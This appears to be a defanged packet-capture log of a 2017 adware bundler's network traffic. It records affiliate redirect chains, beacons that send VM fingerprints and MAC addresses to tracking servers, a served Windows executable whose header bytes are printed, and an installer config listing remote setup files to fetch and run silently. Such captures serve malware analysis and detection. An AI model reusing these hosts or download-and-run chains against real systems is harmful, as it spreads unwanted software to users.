X-Amz-Cf-Id: ToVS7znb4n54FTpJCqeEDPajaMDtZmC1TAonH42w8zerXwUlwFIvKg==
GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cdn2.downloadjelly.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 29603

Connection: keep-alive

Date: Tue, 28 Feb 2017 20:45:15 GMT

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "27e01b52fcb3f43ff9d3f29b0af69137"

Content-Disposition: attachment; filename="dm_left_image.png"

Accept-Ranges: bytes

Server: AmazonS3

Age: 68783

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

X-Amz-Cf-Id: OtghNeIdsLEupBMh79jNNNPUbbCfYiHU0Inci5z5HKQWLjelC0Dezg==
.PNG........IHDR.......e.....5Z......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A22384F4BB6C11E488CDA27B
4BADD3EB" xmpMM:DocumentID="xmp.did:A22384F5BB6C11E488CDA27B4BADD3EB"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A22384F2BB6C11E488
CDA27B4BADD3EB" stRef:documentID="xmp.did:A22384F3BB6C11E488CDA27B4BAD
D3EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.O.8..p.IDATx...[..X.....I..12#.*..{z.f5.y[
....4..$..>.....X..#m.vU.LWfUf......u......`.#3"....H.x.....o......
.i.$...@.........~.Z..xd...w..,....;9......<..-...B.......o.....7._
..w.Y....kn?>...T=..|:..^k.;......".J..B.gM.f).|...<..rK....=.7.
.Z.g....SDG..`.tm.q......ZS...(.V.<....Y.....;z.,?>..|*...k..}ip
..C..=..|B...kV-W.....J....X....k...y>.[z.5.d.l..W.u.1/.....|...r.v
.r}..|*...k...........j<.....p|Q=........$.....C...<..-....{.`..
....._.?x......q.7S>.......W...'_...#..#.p..a.Gy.O...sM!........S..
.3^.p.s.|!........r....@......vM|s3.......?..Bi.&....k._..........
<<< skipped >>>

GET /pr/public/css/style.css HTTP/1.1

Accept: text/css

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 1472

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:33:59 GMT

Last-Modified: Thu, 21 Jul 2016 07:28:41 GMT

ETag: "d87938f58e3b40da8272e3eb0c1b47d3"

Accept-Ranges: bytes

Server: AmazonS3

Age: 17492

X-Cache: Hit from cloudfront

Via: 1.1 1d0fc03b30809d10a25a905ba30d8170.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GEL5-SPie93iAPvqkVjpc2Dpvd2ZnnIZYubzk9LgUYug36eAlfBadg==
body {.  padding: 0;.  margin: 0;.  background-color: white;.  font-fa
mily: arial, sans-serif;.  color: #0b0b0b; }...wrapper {.  position: a
bsolute;.  top: 0;.  bottom: 0;.  left: 0;.  right: 0; }.  .wrapper .h
eader {.    height: 294px;.    margin: 0 auto;.    background-color: #
0b0b0b; }.    .wrapper .header .title {.      color: white;.      text
-align: center; }.      .wrapper .header .title .title-caption, .wrapp
er .header .title .title-caption-inter {.        text-align: center;. 
       font-style: italic;.        font-weight: 600;.        font-size
: 38px;.        line-height: 103px; }.      .wrapper .header .title .t
itle-caption-inter {.        line-height: 40px;.        padding-top: 3
0px; }.      .wrapper .header .title .title-description {.        font
-size: 20px;.        padding-top: 10px;.        width: 615px;.        
margin: 0 auto;.        font-style: italic; }.  .wrapper .content {.  
  text-align: center;.    margin: 0 auto;.    height: 654px;.    backg
round-color: white; }.    .wrapper .content .inner, .wrapper .content 
.inner-typ {.      top: -191px;.      margin: 0 auto;.      position: 
relative;.      width: 800px;.      height: 440px;.      border: 20px 
solid #bfccd2;.      background-color: white; }.    .wrapper .content 
.inner-typ {.      top: -140px; }.    .wrapper .content .adnl_zone {. 
     position: absolute;.      background-color: #bfccd2;.      margin
: auto;.      top: 0;.      right: 0;.      left: 0;.      bottom: 0; 
}...
<<< skipped >>>

GET /report.php?typ=conversion&transId=237110129&affId=1006&instId=11&ho_transId=102fec9aa12d4b58230e6934ddb0c4&s1=201&s2=320779&s3=&s4=LP_DEF&s5=1078188741&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.15297462371944487 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: wake.tendencyrhythm.bid

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Wed, 07 Jun 2017 01:13:46 GMT

Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X
-Powered-By: PHP/5.3.28..Date: Wed, 07 Jun 2017 01:13:46 GMT..Content-
Length: 0..

GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=102fec9aa12d4b58230e6934ddb0c4&transId=237110129&chk_s_b=VMware-56 4d a0 30 e2 be 5d 5f-54 fe 95 b6 80 af 71 a7&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:0C:29:AF:71:A7&randid=0.03931133326107622 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: wake.tendencyrhythm.bid

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Wed, 07 Jun 2017 01:13:46 GMT

Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X
-Powered-By: PHP/5.3.28..Date: Wed, 07 Jun 2017 01:13:46 GMT..Content-
Length: 0..

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCB4rVb3FyuQ1 HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Tue, 06 Jun 2017 20:26:30 GMT

Expires: Sat, 10 Jun 2017 20:26:30 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Cache-Control: public, max-age=345600

Age: 17317
0..........0..... .....0......0...0......J......h.v....b..Z./..2017060
6132828Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.. U....5....20170606132828Z....20170613132828Z0...*.H.............D..
......i.oT...._.b..7.GC..L.K...3..)......`O..C.o*.e....32.ic&.2.)l()..
"Z4.......P...S.W.m.Sf.L.....0t..\..[.x..jw..rw../.X=[.....s.. A7..P.4
P...t .....He.P.[...RO.)/!...g..?.SC.....B....M;u..].r..(...e....hl...
.Q.X`.........&ga...7D=...69....D.....8....HTTP/1.1 200 OK..Content-Ty
pe: application/ocsp-response..Date: Tue, 06 Jun 2017 20:26:30 GMT..Ex
pires: Sat, 10 Jun 2017 20:26:30 GMT..Server: ocsp_responder..Content-
Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORI
GIN..Cache-Control: public, max-age=345600..Age: 17317..0..........0..
... .....0......0...0......J......h.v....b..Z./..20170606132828Z0k0i0A
0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./... U....5....2
0170606132828Z....20170613132828Z0...*.H.............D........i.oT....
_.b..7.GC..L.K...3..)......`O..C.o*.e....32.ic&.2.)l().."Z4.......P...
S.W.m.Sf.L.....0t..\..[.x..jw..rw../.X=[.....s.. A7..P.4P...t .....He.
P.[...RO.)/!...g..?.SC.....B....M;u..].r..(...e....hl....Q.X`.........
&ga...7D=...69....D.....8......

GET /taveara?q=Installation HTTP/1.1

User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)

Host: tragony.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Date: Wed, 07 Jun 2017 01:14:49 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d4098aaada52b67b25a58e4050746cd791496798088; expires=Thu, 07-Jun-18 01:14:48 GMT; path=/; domain=.tragony.info; HttpOnly

X-Powered-By: PHP/5.4.45

Pragma: no-cache

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Cache-Control: post-check=0, pre-check=0

Last-Modified: Wed, 07 Jun 2017 01:14:49 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Location: hXXp://disor.info?ad=2&ver=1&sid=8251&url=http://tracking.revimedia.com/aff_c?offer_id=1199&aff_id=6929&aff_sub=PUBLISHER-ID&aff_sub2=CLICK-ID&aff_sub3=Default3&name=Installation&type=setup&size=3145728&sub_id=346&sub_id2=xix83rL7UAklplfRhE59ceMXcJzpQ_SoLSU9X8J-WPJsn6YCzorJXUDMnpx6I3pRBYWOzidVOdqgwnFypUy8ZhHAzv5shO6ULJCk-043egquzckYfg

Access-Control-Allow-Credentials: true

Access-Control-Allow-Headers: *

Access-Control-Request-Headers: *

Server: cloudflare-nginx

CF-RAY: 36afc1b7b722822b-KBP
0..HTTP/1.1 301 Moved Permanently..Date: Wed, 07 Jun 2017 01:14:49 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=d4098aaada52b67b25a58e4050746cd791496798
088; expires=Thu, 07-Jun-18 01:14:48 GMT; path=/; domain=.tragony.info
; HttpOnly..X-Powered-By: PHP/5.4.45..Pragma: no-cache..Cache-Control:
 no-cache, no-store, must-revalidate, max-age=0..Cache-Control: post-c
heck=0, pre-check=0..Last-Modified: Wed, 07 Jun 2017 01:14:49 GMT..Exp
ires: Mon, 26 Jul 1997 05:00:00 GMT..Location: hXXp://disor.info?ad=2&
ver=1&sid=8251&url=http://tracking.revimedia.com/aff_c?offer
_id=1199&aff_id=6929&aff_sub=PUBLISHER-ID&aff_sub2=CLICK
-ID&aff_sub3=Default3&name=Installation&type=setup&size=3145728&su
b_id=346&sub_id2=xix83rL7UAklplfRhE59ceMXcJzpQ_SoLSU9X8J-WPJsn6YCzorJX
UDMnpx6I3pRBYWOzidVOdqgwnFypUy8ZhHAzv5shO6ULJCk-043egquzckYfg..Access-
Control-Allow-Credentials: true..Access-Control-Allow-Headers: *..Acce
ss-Control-Request-Headers: *..Server: cloudflare-nginx..CF-RAY: 36afc
1b7b722822b-KBP..0..
<<< skipped >>>

GET /?a_aid=65f4g4dfgsdfb1dfgh&page=m-2-panther&clickid=10200827de76ab08c4097a34ad51ad&pubid=6929&aff_sub=PUBLISHER-ID HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.traktrafficflow.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: openresty

Date: Wed, 07 Jun 2017 01:15:05 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

location: hXXp://google.com

X-Frame-Options: ALLOWALL

Set-Cookie: visid_incap_833030=E0zznXKDQWSkxPW8d3 GnJhTN1kAAAAAQUIPAAAAAAAPaTmMlA83k3Cx0HHpSvlI; expires=Wed, 06 Jun 2018 08:10:04 GMT; path=/; Domain=.traktrafficflow.com

Set-Cookie: nlbi_833030=hsqXU2QwETET/FsV/jbergAAAABi3vxriNoJfhI/BUtfsVih; path=/; Domain=.traktrafficflow.com

Set-Cookie: incap_ses_586_833030=RsLAbmSUoAmK3eMRHeQhCJhTN1kAAAAAqBqVuDwMa5wnkB5OKlQHQg==; path=/; Domain=.traktrafficflow.com

Set-Cookie: ___utmvmNmuValX=FlnKyqnQxkQ; path=/; Max-Age=900

Set-Cookie: ___utmvaNmuValX=RqI.CPpz; path=/; Max-Age=900

Set-Cookie: ___utmvbNmuValX=YZh

    XZwOBalq: ztd; path=/; Max-Age=900

X-Iinfo: 10-33926592-33926594 NNNN CT(66 -1 0) RT(1496798104738 1) q(0 0 1 0) r(1 1) U5

X-CDN: Incapsula
0..HTTP/1.1 302 Found..Server: openresty..Date: Wed, 07 Jun 2017 01:15
:05 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: ch
unked..Connection: keep-alive..location: hXXp://google.com..X-Frame-Op
tions: ALLOWALL..Set-Cookie: visid_incap_833030=E0zznXKDQWSkxPW8d3 GnJ
hTN1kAAAAAQUIPAAAAAAAPaTmMlA83k3Cx0HHpSvlI; expires=Wed, 06 Jun 2018 0
8:10:04 GMT; path=/; Domain=.traktrafficflow.com..Set-Cookie: nlbi_833
030=hsqXU2QwETET/FsV/jbergAAAABi3vxriNoJfhI/BUtfsVih; path=/; Domain=.
traktrafficflow.com..Set-Cookie: incap_ses_586_833030=RsLAbmSUoAmK3eMR
HeQhCJhTN1kAAAAAqBqVuDwMa5wnkB5OKlQHQg==; path=/; Domain=.traktrafficf
low.com..Set-Cookie: ___utmvmNmuValX=FlnKyqnQxkQ; path=/; Max-Age=900.
.Set-Cookie: ___utmvaNmuValX=RqI.CPpz; path=/; Max-Age=900..Set-Cookie
: ___utmvbNmuValX=YZh..    XZwOBalq: ztd; path=/; Max-Age=900..X-Iinfo
: 10-33926592-33926594 NNNN CT(66 -1 0) RT(1496798104738 1) q(0 0 1 0)
 r(1 1) U5..X-CDN: Incapsula..0..
<<< skipped >>>

GET /?ad=2&ver=1&sid=8251&url=http://tracking.revimedia.com/aff_c?offer_id=1199&aff_id=6929&aff_sub=PUBLISHER-ID&aff_sub2=CLICK-ID&aff_sub3=Default3&name=Installation&type=setup&size=3145728&sub_id=346&sub_id2=xix83rL7UAklplfRhE59ceMXcJzpQ_SoLSU9X8J-WPJsn6YCzorJXUDMnpx6I3pRBYWOzidVOdqgwnFypUy8ZhHAzv5shO6ULJCk-043egquzckYfg HTTP/1.1

User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)

Host: disor.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Date: Wed, 07 Jun 2017 01:14:50 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dc274546204463d935d4c6b038b37a5bb1496798089; expires=Thu, 07-Jun-18 01:14:49 GMT; path=/; domain=.disor.info; HttpOnly

X-Powered-By: PHP/5.4.16

Location: hXXp://goodreason.top/wEaZwFrowCToRAEIhSTxlTRwSKkwiQ8kxCG1hDxYSAsMVA7gAG3whFPgxC_UzEQ0xI0MSLxghS9UUCI0hJwUiNjQABC0SIX9RArgjPCpzWvAkM_8SF8wTOJ4QOSAiPOcRSbxiH54hAI0gGzQzXl0xQb9AEf4UWY11BBYiFGIgWflkQE11SMlEHHcyAEEwQEt0VCRlQNZ1XBBUTGIBEHEVXaNgHAURHLxUSd4RAVMlXDZgBGQgAbUhBYABFmEkUbFhHQYRUHZ1QaUwAK4xC8wlQQQxG2kgFCEVPuEEK5YyLrQkRRQwCs0gERgUL_YkKrAjM44zI9kjUSYBBmEgCCwlVRF1TJdBGnURDVY1VQdkWFpQE-MwFH4gBQNBPR8hBD9zFAAgRY0xFUUhGdEhAA5AGCMRDZMRBd1zR1UFAXMQEFZVQW0hFKVlVCRkSLlkTSpAAFkEVMl0QLB1EN8RTLozY3l3ZsNmevNGa5R3cxh3crRHculmdrhnb4FWcyFGap9Gc

Server: cloudflare-nginx

CF-RAY: 36afc1ba61f58436-KBP
0..HTTP/1.1 302 Moved Temporarily..Date: Wed, 07 Jun 2017 01:14:50 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=dc274546204463d935d4c6b038b37a5bb1496798
089; expires=Thu, 07-Jun-18 01:14:49 GMT; path=/; domain=.disor.info; 
HttpOnly..X-Powered-By: PHP/5.4.16..Location: hXXp://goodreason.top/wE
aZwFrowCToRAEIhSTxlTRwSKkwiQ8kxCG1hDxYSAsMVA7gAG3whFPgxC_UzEQ0xI0MSLxg
hS9UUCI0hJwUiNjQABC0SIX9RArgjPCpzWvAkM_8SF8wTOJ4QOSAiPOcRSbxiH54hAI0gG
zQzXl0xQb9AEf4UWY11BBYiFGIgWflkQE11SMlEHHcyAEEwQEt0VCRlQNZ1XBBUTGIBEHE
VXaNgHAURHLxUSd4RAVMlXDZgBGQgAbUhBYABFmEkUbFhHQYRUHZ1QaUwAK4xC8wlQQQxG
2kgFCEVPuEEK5YyLrQkRRQwCs0gERgUL_YkKrAjM44zI9kjUSYBBmEgCCwlVRF1TJdBGnU
RDVY1VQdkWFpQE-MwFH4gBQNBPR8hBD9zFAAgRY0xFUUhGdEhAA5AGCMRDZMRBd1zR1UFA
XMQEFZVQW0hFKVlVCRkSLlkTSpAAFkEVMl0QLB1EN8RTLozY3l3ZsNmevNGa5R3cxh3crR
Hculmdrhnb4FWcyFGap9Gc..Server: cloudflare-nginx..CF-RAY: 36afc1ba61f5
8436-KBP..0..
<<< skipped >>>

GET /8gVdhESIJ1QEglEMggWYwgCehFCH90GNQBTctBQfcVQCkVVTh0BeYAG5sQHNwgJAsRFBcRHmMAGTIQVFh1UbpwGfohMaEBGD0BEz8BELswUN5VTLRgBQwRGDghMTYBEK0xFC0hJSoAGNITTFsAHN0hAQwUQFJ0WFwRHAciHX0QFO4QGMUjHcEANVcgMORBGbYgBF4wWVZkFHQDHKABHIggDVpVXZNhOk4TIadTEKE1BbwyPBATUAozGfgyAD8BCK0jIIExA2MDKj8zBaNyXB8RBroCOsIzCBgwN140FK4SI2AUPRJDUswzJJ0jMlgwAkEBLh0hGAFFNJ8TEFoRBS4iPRJyHHBUAHogVWp1Sd0gLDgBBLZ0SPtFWER1TQEhJMcwBOR1WBZlRUllRah0UbpQEP0xTYpVCbYQEfo1QbFQAYkRVFh0BWYwHHIQAVwgCAsjVWpFHUUwHDFUVa5RBM4QDDoCUHpBDd0iEKkxX90CXq4iPlkCVL1gHVEzCSkxXqsTW-0TMq0SPjgzJUhAHKATDA8wSNpEQY9EEFcyHfUwVYRlRYdVDQATGDgwCbckGxQhENcVJUsgEPxgHN8ABQkhDUAkCaEhENMhBYcVJWhzSRkxABg0UbNQGTwUQWlETcpkVWpVHQcxUN9kRLB1SLoQHEVhOtRHe55mc0xGe5lHZxFWb3lmapl3brZmb HTTP/1.1

User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)

Host: aleph.comparent.ru

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Wed, 07 Jun 2017 01:14:51 GMT

Content-Type: application/exe

Content-Length: 3906752

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Wed, 07 Jun 2017 01:14:51 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="installation.exe";

Content-Transfer-Encoding: binary

Pragma: public
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....V..."(......a.......p....@..........................P<.....V$&
lt;..........@............................!..1...."..............|;.. 
...p!.0J...........................`!.................................
....................CODE.....T.......V.................. ..`DATA......
...p.......Z..............@...BSS.....ay.... ......x .................
.idata...1....!..2...x .............@....tls....0....P!....... .......
...........rdata.......`!....... .............@..P.reloc..0J...p!..L..
.. .............@..P.rsrc.........".......!.............@..P..........
....2.......1.............@..P........................................
......................................................................
....................................................@...Boolean.......
....@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...
Smallint..........p.@...Integer.............@...Byte............@...Wo
rd............@...Cardinal............@...Int64...................@...
Double..@...@...Currency....@...ShortString.....@...WordBool..........
.@..False.True..@.@...StringL.@...WideString\.@...Variant.@.l.@...OleV
ariant..@...............................@.........LC@.XC@.\C@.`C@.TC@.
.@@..@@..@@..TObject..@...TObject..@........System....@...IInterfa
<<< skipped >>>

GET /08e0b779-c1db-404a-b9a2-b4657d709f22 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: trk2.wlpreexactiontr.bid

Connection: Keep-Alive

HTTP/1.1 302 Found

Cache-Control: no-store, no-cache, pre-check=0, post-check=0

Date: Wed, 07 Jun 2017 01:14:47 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Location: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Pragma: no-cache

Server: nginx

Set-Cookie: 08e0b779-c1db-404a-b9a2-b4657d709f22-v4=08e0b779-c1db-404a-b9a2-b4657d709f22; Domain=trk2.wlpreexactiontr.bid; Path=/; HttpOnly

Set-Cookie: voluum-cid-v4={
  "cid" : "wAEH2LKRVT645HT51JQP7QD6",
  "caid" : "08e0b779-c1db-404a-b9a2-b4657d709f22"
}; Domain=trk2.wlpreexactiontr.bid; Expires=Thu, 07-Jun-2018 01:14:48 GMT; Path=/; HttpOnly

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Found..Cache-Control: no-store, no-cache, pre-check=0, po
st-check=0..Date: Wed, 07 Jun 2017 01:14:47 GMT..Expires: Thu, 01 Jan 
1970 00:00:00 GMT..Location: hXXp://ic-dc.bundlessafevault.com/pr/3e07
b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html..Pragma: no-cache..Server:
 nginx..Set-Cookie: 08e0b779-c1db-404a-b9a2-b4657d709f22-v4=08e0b779-c
1db-404a-b9a2-b4657d709f22; Domain=trk2.wlpreexactiontr.bid; Path=/; H
ttpOnly..Set-Cookie: voluum-cid-v4={
  "cid" : "wA
EH2LKRVT645HT51JQP7QD6",
  "caid" : "08e0b779-c1
db-404a-b9a2-b4657d709f22"
}; Domain=trk2.wlpreexactiontr.bid; E
xpires=Thu, 07-Jun-2018 01:14:48 GMT; Path=/; HttpOnly..Content-Length
: 0..Connection: keep-alive..

GET hXXp://disk.thingunit.bid/aff_c?offer_id=4&aff_id=2601&source=2519&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1280881289&url=http://when.legtest.bid/offer.php?affId={aff_id}&trackingId=237110129&instId=2519&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: disk.thingunit.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Wed, 07 Jun 2017 01:14:35 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://when.legtest.bid/offer.php?affId=2601&trackingId=237110129&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.11.8

Set-Cookie: enc_aff_session_4=ENC02894-102fec9aa12d4b58230e6934ddb0c4-2601-4-0-0-0-0-UA-0-32353139-_-_-_-4C505F444546-31323830383831323839-194.242.96.226-20170606211435-_-0C3D546F0A02170B350B6463364508601E6E640303084947576D155156055F24042246775F35117B09; expires=Fri, 07 Jul 2017 01:14:35 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Fri, 01 May 2020 11:54:35 GMT; path=/;

tracking_id: 102fec9aa12d4b58230e6934ddb0c4

X-Robots-Tag: noindex, nofollow

Content-Length: 488

Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://when.legtest.bid/offer.php?affId=2601&trackingId=2371
10129&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4
&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.
16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104c
ca24294ae7d8d45ce8d028&v=3">here</a>.</p>.</body
></html>...
<<< skipped >>>

GET /start.php?p=sevenzip&pid=201&tid=320779&sid=101 HTTP/1.0

Host: pe-mainin.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Date: Wed, 07 Jun 2017 01:14:31 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 597

Connection: close

Content-Type: text/html; charset=UTF-8
files=3.u1=hXXp://meat.detailrobin.bid/?affId=1006&appTitle=Installati
on&s1=201&s2=320779&setupName=cpSetup&appVersion=2.92&instId=11&exe=1.
n1=cpSetup.exe.m1=0.u2=hXXp://birth.babieshistory.bid/stub_maker_uk2.p
hp?url=hXXp://tragony.info/taveara?q=Installation.n2=sevensetup.exe.m2
=0.u3=hXXp://VVV.bringmethefile.com/xdownload.php?version=1.1.5.26&mon
itor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.
php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=%
2FS&instid[appimageurl]=http://pe-sixi.com/img/icon_installe
r.png.n3=Setup__21223_il2.exe.m3=0.....

GET /xdownload.php?version=1.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0

Host: VVV.bringmethefile.com

